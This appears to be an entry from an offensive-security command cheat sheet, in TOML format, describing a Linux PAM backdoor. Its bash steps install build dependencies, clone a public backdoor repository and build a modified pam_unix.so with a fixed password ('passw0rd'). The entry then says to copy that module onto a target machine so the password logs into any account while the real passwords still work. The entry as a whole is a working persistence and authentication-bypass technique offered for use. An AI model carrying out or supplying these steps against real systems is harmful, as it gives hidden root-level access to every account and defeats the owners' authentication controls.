title = "Linux PAM backdoor"
description = "Log in into any user using a custom password (root required)"
tags = ["linux", "backdoor"]
source = ["https://github.com/zephrax/linux-pam-backdoor","https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9"]

[[data]]
description = "PAM (Pluggable Authentication Modules) backdoor to log in into any user (root required):"
language = "bash"
command = """#Compilation dependencies: apt install -y autoconf automake autopoint bison bzip2 docbook-xml docbook-xsl flex gettext libaudit-dev libcrack2-dev libdb-dev libfl-dev libselinux1-dev libtool libcrypt-dev libxml2-utils make pkg-config sed w3m xsltproc xz-utils gcc

git clone https://github.com/zephrax/linux-pam-backdoor
#Change 1.4.0 to other existing version if applicable (https://github.com/linux-pam/linux-pam/releases)
#PAM version should be compatible with the one on the target machine
./backdoor.sh -v 1.4.0 -p passw0rd
#This will generate a pam_unix.so. Copy it to /lib/x86_64-linux-gnu/security/ on the target machine.
#Now log in into any user using the password 'passw0rd'. The original user's password still works."""
